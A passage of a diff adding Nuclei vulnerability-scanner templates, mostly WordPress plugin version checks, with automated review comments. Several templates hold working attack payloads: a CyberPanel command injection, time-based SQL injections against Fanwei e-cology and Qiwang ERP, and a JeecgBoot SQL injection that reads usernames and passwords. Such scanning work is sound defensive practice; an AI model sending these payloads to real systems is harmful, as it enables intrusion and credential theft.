+ The Companion Portfolio – Responsive Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'companion-portfolio' shortcode in all versions up to, and including, 2.4.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/21df75e6-1f3e-4a08-a620-92b44fb48899?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11867
+ metadata:
+ fofa-query: "wp-content/plugins/companion-portfolio/"
+ google-query: inurl:"/wp-content/plugins/companion-portfolio/"
+ shodan-query: 'vuln:CVE-2024-11867'
+ tags: cve,wordpress,wp-plugin,companion-portfolio,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/companion-portfolio/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "companion-portfolio"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.0.1')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml b/poc/sql/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml
new file mode 100644
index 0000000000..bbbe0e8e1e
--- /dev/null
+++ b/poc/sql/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11869-50ed005605a356d0d3b23edb855715d9
+
+info:
+ name: >
+ Buk for WordPress <= 1.0.7 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Buk for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'buk' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc1ebc34-d728-42b4-92b4-9e1a4ebd88b2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11869
+ metadata:
+ fofa-query: "wp-content/plugins/buk-appointments/"
+ google-query: inurl:"/wp-content/plugins/buk-appointments/"
+ shodan-query: 'vuln:CVE-2024-11869'
+ tags: cve,wordpress,wp-plugin,buk-appointments,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/buk-appointments/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "buk-appointments"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.7')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml b/poc/sql/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml
new file mode 100644
index 0000000000..28dc3ec7f2
--- /dev/null
+++ b/poc/sql/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849
+
+info:
+ name: >
+ Connatix Video Embed <= 1.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Connatix Video Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cnx_script_code' shortcode in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/89512190-a0fe-495a-9dda-8d8540a5325c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11883
+ metadata:
+ fofa-query: "wp-content/plugins/connatix-video-embed/"
+ google-query: inurl:"/wp-content/plugins/connatix-video-embed/"
+ shodan-query: 'vuln:CVE-2024-11883'
+ tags: cve,wordpress,wp-plugin,connatix-video-embed,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/connatix-video-embed/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "connatix-video-embed"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.5')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml b/poc/sql/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml
new file mode 100644
index 0000000000..645549d8ce
--- /dev/null
+++ b/poc/sql/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6
+
+info:
+ name: >
+ Crafthemes Demo Import <= 3.3 - Authenticated (Admin+) Arbitrary File Upload in process_uploaded_files
+ author: topscoder
+ severity: low
+ description: >
+ The Crafthemes Demo Import plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'process_uploaded_files' function in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e44dd0e8-e6e7-4a2d-b9ca-abd1de273092?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2024-9698
+ metadata:
+ fofa-query: "wp-content/plugins/crafthemes-demo-import/"
+ google-query: inurl:"/wp-content/plugins/crafthemes-demo-import/"
+ shodan-query: 'vuln:CVE-2024-9698'
+ tags: cve,wordpress,wp-plugin,crafthemes-demo-import,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/crafthemes-demo-import/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "crafthemes-demo-import"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3')
\ No newline at end of file
diff --git a/poc/sql/adbuddy-adblocker-detection.yaml b/poc/sql/adbuddy-adblocker-detection.yaml
new file mode 100644
index 0000000000..ef8c6f2261
--- /dev/null
+++ b/poc/sql/adbuddy-adblocker-detection.yaml
@@ -0,0 +1,59 @@
+id: adbuddy-adblocker-detection-3bb46498f1afb79669fda4714744548d
+
+info:
+ name: >
+ adBuddy+ (AdBlocker Detection) by NetfunkDesign <= 1.1.3 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fd0a887-db61-4b2d-af52-ec1d9c525663?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/adbuddy-adblocker-detection/"
+ google-query: inurl:"/wp-content/plugins/adbuddy-adblocker-detection/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,adbuddy-adblocker-detection,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/adbuddy-adblocker-detection/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "adbuddy-adblocker-detection"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.3')
\ No newline at end of file
diff --git a/poc/sql/cricket-score-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a.yaml b/poc/sql/cricket-score-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a.yaml
new file mode 100644
index 0000000000..c75b766d8e
--- /dev/null
+++ b/poc/sql/cricket-score-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a.yaml
@@ -0,0 +1,59 @@
+id: cricket-score-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a
+
+info:
+ name: >
+ Cricket Live Score <= 2.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9fe750f-5d8f-4c47-9d75-d928f1367fa8?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cricket-score/"
+ google-query: inurl:"/wp-content/plugins/cricket-score/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cricket-score,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cricket-score/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cricket-score"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.2')
\ No newline at end of file
diff --git a/poc/sql/cyberpanel-upgrademysqlstatus-rce.yaml b/poc/sql/cyberpanel-upgrademysqlstatus-rce.yaml
new file mode 100644
index 0000000000..9527fa8bbe
--- /dev/null
+++ b/poc/sql/cyberpanel-upgrademysqlstatus-rce.yaml
@@ -0,0 +1,24 @@
+id: cyberpanel-upgrademysqlstatus-rce
+
+info:
+ name: cyberpanel-upgrademysqlstatus-rce
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: app="CyberPanel"
+
+http:
+ - raw:
+ - |
+ GET /dataBases/upgrademysqlstatus HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
+ Content-Type: application/json
+ Connection: close
+
+ {"statusfile":"1;id;#"}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body,"uid=") && contains_all(body,"gid=")
\ No newline at end of file
diff --git a/poc/sql/fanwei-Ecology-LoginSSO-sqli.yaml b/poc/sql/fanwei-Ecology-LoginSSO-sqli.yaml
new file mode 100644
index 0000000000..2c70d7a8b4
--- /dev/null
+++ b/poc/sql/fanwei-Ecology-LoginSSO-sqli.yaml
@@ -0,0 +1,29 @@
+id: fanwei-Ecology-LoginSSO-sqli
+
+info:
+ name: fanwei-Ecology-LoginSSO-sqli
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: app="泛微-OA(e-cology)"
+
+requests:
+ - raw:
+ - |+
+ GET /weaver/FileDownloadLocation/login/LoginSSO.%2520jsp?ddcode=7ea7ef3c41d67297&mrfuuid=1%27;if+db_name(1)=%27master%27+WAITFOR+delay+%270:0:3%27--+&mailid=0&a=.swf HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - duration > 3 && duration < 6 && status_code==302
+
+
+
+ extractors:
+ - type: dsl
+ dsl:
+ - duration
\ No newline at end of file
diff --git a/poc/sql/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml b/poc/sql/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml
new file mode 100644
index 0000000000..85846ae883
--- /dev/null
+++ b/poc/sql/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml
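Review bot: The request in `cyberpanel-upgrademysqlstatus-rce` carries a `statusfile` value that makes a vulnerable target run a shell command, yet `info` has no `description`, `reference`, `classification` or `tags`, so an operator cannot see what the check does or keep it out of a non-intrusive run. I would add `tags: cyberpanel,rce,intrusive` and a one-line `description` stating that the check executes a command on the host. The file is added under `poc/sql/` although the id says `rce`. The other PokerSec templates in this patch (`fanwei-Ecology-*`, `jeecg-boot-*`, `qiwang-ERP-*`, `yongyou-*`, `zhilink-SRM-*`) have the same bare `info` block with only a `fofasearch` key.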
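Review bot: The matcher `duration > 3 && duration < 6 && status_code==302` in `fanwei-Ecology-LoginSSO-sqli` decides on a single response time with no baseline, so a target that is simply slow to answer reports as vulnerable and one whose own latency pushes the total past the upper bound is missed. Findings from it need manual confirmation, and I would say so in a `description` line, which the template currently lacks. `condition: and` has no effect on a single DSL expression, and the template uses the `requests:` key while the other templates in this patch use `http:`. `qiwang-ERP-drawGrid-sqli` later in the patch uses the same `duration > 3 && duration < 6` window.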
@@ -0,0 +1,28 @@ +id: fanwei-Ecology-browser-sqli + +info: + name: fanwei-Ecology-browser-sqli + author: PokerSec + severity: high + metadata: + fofasearch: app="泛微-OA(e-cology)" + +requests: + - raw: + - |- + POST /mobile/%20/plugin/browser.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%
37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%32%25%33%37%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%39%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - countSql + - baseSql + - type: status + status: + - 200 diff --git a/poc/sql/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml b/poc/sql/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml new file mode 100644 index 0000000000..5396874e7a --- /dev/null +++ b/poc/sql/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml 
@@ -0,0 +1,59 @@
+id: ims-countdown-afc1b693115a4259c31be875ae4878db
+
+info:
+ name: >
+ IMS Countdown <= 1.3.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2de22728-4f67-406c-9db5-33cbba4c15eb?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ims-countdown/"
+ google-query: inurl:"/wp-content/plugins/ims-countdown/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ims-countdown,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ims-countdown/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ims-countdown"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.4')
\ No newline at end of file
diff --git a/poc/sql/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml b/poc/sql/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml
new file mode 100644
index 0000000000..fb0e831cf5
--- /dev/null
+++ b/poc/sql/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml
@@ -0,0 +1,23 @@
+id: jeecg-boot-getTotalData-sqli-CVE-2024-48307
+
+info:
+ name: jeecg-boot-getTotalData-sqli-CVE-2024-48307
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: app="JeecgBoot-企业级低代码平台" || body="/_app.config.js?v=3.7.1"
+
+http:
+ - raw:
+ - |-
+ POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(username,0x3a,password)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}
+
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200 && contains_all(body,"chartData") && contains_all(body,"concat(username") && contains_all(body,"yAxisIndex")
\ No newline at end of file
diff --git a/poc/sql/movie-database.yaml b/poc/sql/movie-database.yaml
new file mode 100644
index 0000000000..4ab079df9b
--- /dev/null
+++ b/poc/sql/movie-database.yaml
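Review bot: The request body in `jeecg-boot-getTotalData-sqli-CVE-2024-48307` asks the endpoint for `concat(username,0x3a,password)` from `sys_user`, so on a vulnerable host the response, and any scan log or report that stores it, holds real account names and password values. Output from this template should be handled as credential material, and the check would be safer to keep and run if it did not read credential columns at all. `info` gives no `description` or `reference` for the CVE named in the id, and `condition: and` has no effect on a single DSL expression.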
@@ -0,0 +1,59 @@
+id: movie-database-b1e09ab8611ddb31d85cd0e793d89389
+
+info:
+ name: >
+ Movie Database <= 1.0.11 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e3d8daef-787d-43f1-a438-958295294f6c?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/movie-database/"
+ google-query: inurl:"/wp-content/plugins/movie-database/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,movie-database,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/movie-database/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "movie-database"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.11')
\ No newline at end of file
diff --git a/poc/sql/qiwang-ERP-drawGrid-sqli.yaml b/poc/sql/qiwang-ERP-drawGrid-sqli.yaml
new file mode 100644
index 0000000000..ff2f12c411
--- /dev/null
+++ b/poc/sql/qiwang-ERP-drawGrid-sqli.yaml
@@ -0,0 +1,29 @@
+id: qiwang-ERP-drawGrid-sqli
+
+info:
+ name: qiwang-ERP-drawGrid-sqli
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: app="企望-ERP系统"
+
+http:
+ - raw:
+ - |
+ POST /mainFunctions/drawGrid.action;cookieLogin.action HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ tablename=1';WAITFOR DELAY '0:0:3'--
+
+
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200 && duration > 3 && duration < 6
+
+ extractors:
+ - type: dsl
+ dsl:
+ - duration
\ No newline at end of file
diff --git a/poc/sql/sip-calculator-03696418e2ddb2e57359bcf1347e1091.yaml b/poc/sql/sip-calculator-03696418e2ddb2e57359bcf1347e1091.yaml
new file mode 100644
index 0000000000..bd45e9382f
--- /dev/null
+++ b/poc/sql/sip-calculator-03696418e2ddb2e57359bcf1347e1091.yaml
@@ -0,0 +1,59 @@
+id: sip-calculator-03696418e2ddb2e57359bcf1347e1091
+
+info:
+ name: >
+ SIP Calculator <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/03afffcc-02fe-4054-8876-6a4e4d9de071?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/sip-calculator/"
+ google-query: inurl:"/wp-content/plugins/sip-calculator/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,sip-calculator,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sip-calculator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sip-calculator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0')
\ No newline at end of file
diff --git a/poc/sql/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml b/poc/sql/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml
new file mode 100644
index 0000000000..9fe7706c2e
--- /dev/null
+++ b/poc/sql/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml
@@ -0,0 +1,59 @@
+id: wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd
+
+info:
+ name: >
+ WP Job Portal <= 2.2.1 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d8961fd-68ac-4a10-ab26-cfcda27c18e8?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-job-portal/"
+ google-query: inurl:"/wp-content/plugins/wp-job-portal/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-job-portal,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-job-portal"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.1')
\ No newline at end of file
diff --git a/poc/sql/ymc-states-map-696be7426132daf80e136f71893126db.yaml b/poc/sql/ymc-states-map-696be7426132daf80e136f71893126db.yaml
new file mode 100644
index 0000000000..e4b2bb1cc9
--- /dev/null
+++ b/poc/sql/ymc-states-map-696be7426132daf80e136f71893126db.yaml
@@ -0,0 +1,59 @@
+id: ymc-states-map-696be7426132daf80e136f71893126db
+
+info:
+ name: >
+ States Map US <= 2.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/bdd07160-721b-4807-a227-72cd91faef39?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ymc-states-map/"
+ google-query: inurl:"/wp-content/plugins/ymc-states-map/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ymc-states-map,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ymc-states-map/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ymc-states-map"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.2')
\ No newline at end of file
diff --git a/poc/sql/yongyou-nc-process-sqli.yaml b/poc/sql/yongyou-nc-process-sqli.yaml
new file mode 100644
index 0000000000..d4310a0d4c
--- /dev/null
+++ b/poc/sql/yongyou-nc-process-sqli.yaml
